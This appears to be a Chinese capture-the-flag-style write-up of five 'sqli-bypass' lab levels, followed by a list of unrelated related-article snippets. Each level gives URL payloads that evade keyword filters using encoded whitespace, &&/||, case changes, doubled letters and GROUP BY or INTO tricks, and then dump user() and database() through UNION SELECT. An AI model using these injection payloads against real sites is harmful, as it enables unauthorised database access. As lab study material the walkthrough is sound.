sqli-bypass wp

news2024/11/24 1:51:51

sqli-bypass靶场

level 1

尝试注入点

1 ,1'1'',1",1""

==》存在字符型单引号注入

id=1'and(1)--+

==>提示存在sql注入

bypass

and()--+都可能存在被屏蔽掉

  • 尝试#代替--+

    id=1'and(1)%23

    ==》 正常回显,说明–+被屏蔽了,and,()没有屏蔽

  • 尝试空格

    id=1'+and(1)%23

    空格被绕过

  • 尝试%0a,%0b代替空格

    id=1'%0aand%0a(1)%23

    ==》正常回显,%0a没有被绕过。同理%0b/**/%09也没

  • 尝试order by

    id=1'/**/order/**/by/**/10%23

    ==》回显正常,二分法得到列数8

  • 尝试union select

    id=-1'/**/union/**/select/**/1,2,3,4,5,6,7,8%23

    ==>回显为4,5

  • 在回显位进行user,database爆破

    id=-1'/**/union/**/select/**/1,2,3,user(),database(),6,7,8%23

    成功爆破

    image-20231110181416566

level 2

尝试注入点

1 ,1'1'',1",1""

==》存在字符型单引号注入

bypass

  • id=1'--+

    ==》回显正常,–、空格没有被屏蔽

  • id=1'+and+(1)--+

    ==> 回显异常,and或者()被过滤了

    • 尝试%26%26

      ==> 回显正常,and被过滤了,使用&&代替,()没有

    • 同理

      ==> or也被过滤了,使用||代替

  • 爆破列数:id=1'+order+by+10--+

    ==》order by 被过滤了

    • 尝试大小写绕过:id=1'+Order+by+10--+

      ==>回显正常,二分法获取列数8

  • 爆破回显位:id=-1'+union+select+1,2,3,4,5,6,7,8--+

    ==>回显正常,union select没有被屏蔽,得到回显位 4,5

  • 爆破字段:id=-1'+union+select+1,2,3,user(),database(),6,7,8--+

    ==>回显 正常,user,database关键字没有被屏蔽,爆破成功。

    image-20231110184742041

level 3

尝试注入点

1 ,1'1'',1",1""

==》存在字符型单引号注入

bypass

  • 空格是否被屏蔽:id=1'--+

    ==>没有

  • and是否被屏蔽:id=1'+and+1--+

    ==》被屏蔽

    • 尝试%26%26id=1'+%26%26+1--+

      ==> 没有被屏蔽。用%26%26代替and

  • order by是否被屏蔽:id=1'+order+by+1--+

    ==> 没有。通过二分法,爆破列数为8

  • union select是否被屏蔽:id=-1'+union+select+1,2,3,4,5,6,7,8--+

    ==> 没有,爆破列数4,5

  • 爆破字段值:id=-1'+union+select+1,2,3,user(),database(),6,7,8--+

    ==>回显正常,同level2

level 4

尝试注入点

略,同level3,字符型单引号注入

bypass

  • 空格是否被过滤:同level3

    没有

  • and是否被过滤: 同level3

    同level3,使用%26%26代替and

  • order by是否被过滤

    ==>被过滤了

    • 测试order关键字是否被过滤:id=1'+/*order*/--+

      • 测试那个字符被过滤: id=1'+/*oarder*/--+id=1'+/*orader*/--+

        or字段被过滤了,by没有

      • 测试大小写绕过:id=1'+/*oRder*/--+

        被过滤

      • 测试双写绕过:id=1'+/*oorrder*/--+

        被过滤

  • 获取列数

    • order by因为or被过滤了,所有用不了,这里提供两种方式替代

      • group by绕过:`id=1’+group+by+10–+

        `

        image-20231110211152643

        image-20231110211211742

        ==> 爆破8列

      • into绕过:id=1'+into+@1,@2,@3,@4,@5,@6,@7,@8--+

        image-20231110211403126

        image-20231110211433795

        注:into的值要加@,@1,@2,@3...

        ==> 爆破8列

  • union select是否被屏蔽: 同level 3,没有

  • 爆破字段值:同level 3

level 5

尝试注入点

略,同level3,字符型单引号注入

bypass

  • 空格是否被过滤:同level3

    没有

  • and是否被过滤: 同level3

    同level3,使用%26%26代替and

  • order by是否被过滤

    ==>被过滤了,提示显示or字符别过滤了

    image-20231110191329717

    • or之间增加or绕过:id=1'+oorrder+by+8--+

      ==>成功回显,爆破列数8

  • union select是否被屏蔽: 同level 3,没有

    爆破字段值:同level 3

  • order by是否被过滤

    ==>被过滤了,提示显示or字符别过滤了

    image-20231110191329717

    • or之间增加or绕过:id=1'+oorrder+by+8--+

      ==>成功回显,爆破列数8

  • union select是否被屏蔽: 同level 3,没有

  • 爆破字段值:同level 3

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1194121.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

相机标定:张正友标定原理

本文来自公众号“AI大道理” —————— 计算机视觉的源头是相机,因此我们有必要对相机有所了解。 原始相机拍摄的图像一般都会有所畸变,导致画面和实际观测的有所排查,为了让相机拍摄的图像和肉眼观察的一致,就需要进行相机标…

双网卡多网卡时win11如何设置网卡优先级

背景: 电脑需要同时使用多个网卡,一个用于被远程、另一个用于打开网页。 电脑打开网页时,走的是哪个网卡,是根据网卡优先级来的。 打开控制面板、网络和Internet、网络和共享中心 点击左侧 更改适配器设置。我这里可见两个网卡…

C语言—统计从键盘输入的一行英文句子的字符个数

流程图 代码 #include <stdio.h>int main() {int count0;printf("请输入英文字符&#xff0c;回车确认&#xff1a;");while (getchar()!\n){count count 1;}printf("共输入%d个字符\n", count);system("pause");return 0; }请输入英文字…

Git的安装,简介以及常用命令【超详细】

目录 一. Git简介 分布式特点 优缺点 Git 与 SVN 区别 二. Git安装 三. Git常用命令 四. Git的文件状态 1.文件状态 2.工作区域 一. Git简介 Git 是一个开源的分布式版本控制系统&#xff0c;可以有效、高速地处理从很小到非常大的项目版本管理。 也是Linus Torvalds…

粘性定位-最下面怎么出现留白

问题&#xff1a;出现了留白 <!DOCTYPE html> <html lang"en"><head><meta charset"UTF-8" /><meta name"viewport" content"widthdevice-width, initial-scale1.0" /><title>Document</title…

网格变形算法

网格变形 需求分析技术分析 需求分析 根据几何模型上的几个特征点&#xff0c;对几何模型进行变形。比如 技术分析 把几何模型使用三角面片表示&#xff0c;然后通过网格映射变形进行实现。关于网格这块有本经典的书可以参考&#xff0c;《ploygon mesh processing》。上面…

海外跨境电商商城源码,开启多语言多货币多商家入驻的电商新时代!

尊敬的CSDN用户们&#xff0c;你们好!我们很高兴地向您介绍一款引领未来电商潮流的全新产品——海外跨境电商商城源码!这款源码将为您打开多语言、多货币、多商家入驻的电商新时代&#xff0c;让您轻松打造出属于自己的跨境电商平台! 一、多语言支持&#xff0c;轻松拓展全球市…

创建一个小表表空间A。一个大表表空间B.并创建一个用户B1默认表空间为B。

目录 ​编辑 1、创建小表表空间 A 2、创建大表表空间 B 3、创建用户 B1 并将其默认表空间设置为 B 4、授权给用户 B1 的权限 1、创建小表表空间 A CREATE TABLESPACE A DATAFILE /u01/app/oracle/oradata/orcl/datafile_A.dbf SIZE 10M; 2、创建大表表空间 B 这个时间会略…

数据库-MySQL之数据库必知必会1-9章

检索数据 1.检索不重复的行 从 Customers 表中检索所有的 ID select DISTINCT cust_id from Customers;DISTINCT表示去掉重复的行 2.限制结果-分页 SELECT语句返回所有匹配的行&#xff0c;它们可能是指定表中的每个行。为了返回第一行或前几行&#xff0c;可使用LIMIT子句。…

CSRF(跨站请求伪造)攻击演示

目录 CSRF(跨站请求伪造)攻击演示CSRF 是什么CSRF 演示项目代码CSRF 演示过程服务启动演示 CSRF(跨站请求伪造)攻击演示 CSRF 是什么 CSRF&#xff08;Cross-Site Request Forgery&#xff09;跨站请求伪造&#xff0c;是一种网络安全攻击&#xff0c;其目标是利用被攻击者在…

开源跨平台绘图软件draw.io Mac/Win免费下载:让创意无限飞

你是否曾经遇到过在创作时&#xff0c;因为缺乏合适的绘图工具而无法充分表达你的想法&#xff1f;或者在团队项目中&#xff0c;因为沟通障碍而无法有效地进行视觉呈现&#xff1f;现在&#xff0c;让我们一起探索一个全新的开源跨平台绘图软件 - draw.io。 draw.io是一款完全…

非常好用的组件库【semi.design】

文章目录 前言semi.design是什么&#xff1f;怎么使用&#xff1f;设计稿转代码后言 前言 hello world欢迎来到前端的新世界 &#x1f61c;当前文章系列专栏&#xff1a;前端系列文章 &#x1f431;‍&#x1f453;博主在前端领域还有很多知识和技术需要掌握&#xff0c;正在不…

使用jdk21预览版 --enable-preview

异常 [ERROR] Failed to execute goal org.apache.maven.plugins:maven-compiler-plugin:3.10.1:compile (default-compile) on project sb3: Compilation failure [ERROR] --enable-preview 一起使用时无效 [ERROR] &#xff08;仅发行版 21 支持预览语言功能&#xff09; 解决…

Matplotlib数据可视化综合应用Matplotlib图形配置在线闯关_头歌实践教学平台

Matplotlib数据可视化综合应用图形配置 第1关 配置颜色条第2关 设置注释第3关 自定义坐标刻度第4关 配置文件与样式表 第1关 配置颜色条 任务描述 本关任务&#xff1a;使用colorbar绘制一个热成像图。 编程要求 在右侧编辑器Begin-End处补充代码&#xff0c;根据输入数据绘制…

数据结构-图的课后习题(2)

题目要求&#xff1a; 对于下面的这个无向网&#xff0c;给出&#xff1a; 1.“深度优先搜索序列”&#xff08;从V1开始&#xff09; 2.“广度优先序列”&#xff08;从V1开始&#xff09; 3.“用Prim算法求最小生成树” 代码实现&#xff1a; 1.深度优先搜索&#xff1a…

一分钟秒懂人工智能对齐 ( 文末送书 )

人工智能对齐 什么是人工智能对齐为什么要研究人工智能对齐人工智能对齐的常见方法延伸阅读写在末尾&#xff1a; 主页传送门&#xff1a;&#x1f4c0; 传送 什么是人工智能对齐 人工智能对齐&#xff08;AI Alignment&#xff09;指让人工智能的行为符合人的意图和价值观。 …

方太集团合同档案管理平台,让数字化成果深度利用、可查可验

数字经济大背景下&#xff0c;方太集团积极拥抱企业数字化转型&#xff0c;推动合同档案业务管理数字化&#xff0c;助力业务档案高效融合&#xff0c;助力企业创新科技发展。 方太集团&#xff08;以下简称“方太”&#xff09;创建于1996年。作为一家以智能厨电为核心业务的…

[LeetCode]-225. 用队列实现栈

目录 225. 用队列实现栈 题目 ​思路 代码 225. 用队列实现栈 225. 用队列实现栈 - 力扣&#xff08;LeetCode&#xff09;https://leetcode.cn/problems/implement-stack-using-queues/description/ 题目 请你仅使用两个队列实现一个后入先出&#xff08;LIFO&#xff0…

【师兄啊师兄2】大爆料,敖乙回归,创造新里程碑,有望做成年番

Hello,小伙伴们&#xff0c;我是小郑继续为大家深度解析国漫资讯。 深度爆料《师兄啊师兄》最新资讯消息&#xff0c;玄机公司&#xff0c;作为动漫制作界的佼佼者&#xff0c;其制作的动漫作品一直以来备受瞩目。如今&#xff0c;在斗罗大陆第二部和吞噬星空第四季的热播之下…

node插件MongoDB(四)—— 库mongoose 的个性话读取(字段筛选、数据排序、数据截取)(四)

文章目录 一、字段筛选二、数据排序三、数据截取1. skip 跳过2. limit 限定![在这里插入图片描述](https://img-blog.csdnimg.cn/c7067b1984ee4c6686f8bbe07cae9176.png) 一、字段筛选 字段筛选&#xff1a;只读取指定的数据&#xff0c;比如集合&#xff08;表&#xff09;中有…